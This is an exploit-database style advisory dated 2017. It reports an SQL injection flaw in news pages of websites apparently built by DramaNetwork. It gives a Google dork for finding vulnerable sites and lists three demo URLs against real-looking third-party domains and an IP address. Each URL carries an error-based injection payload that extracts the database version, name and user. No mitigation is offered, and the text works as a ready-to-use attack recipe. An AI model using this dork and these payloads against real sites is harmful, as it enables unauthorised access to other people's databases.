######################
# Exploit Title : DramaNetwork SQL injection Vulnerability
#
# Exploit Author : Ashiyane Digital Security Team
#
# Vendor Homepage : http://www.drama.com.tw/
#
# Google Dork : intext:"Designed by DramaNetwork" inurl:"news.php"
#
# Date: 2017 03 February
#
# Tested On : Win 10 / Google Chrome / Mozilla Firefox
#
######################
#
# demos :
#
# http://www.hongyou.com.tw/news.php?newid=93 or 1 group by concat_ws(0x3a,version(),database(),user(),floor(rand(0)*2)) having min(0) or 1--
#
# http://www.holinco.com.tw/news.php?newid=72 or 1 group by concat_ws(0x3a,version(),database(),user(),floor(rand(0)*2)) having min(0) or 1--
#
# http://59.124.93.169/news.php?newid=108 or 1 group by concat_ws(0x3a,version(),database(),user(),floor(rand(0)*2)) having min(0) or 1--
#
######################
#
# discovered by : modiret
#
######################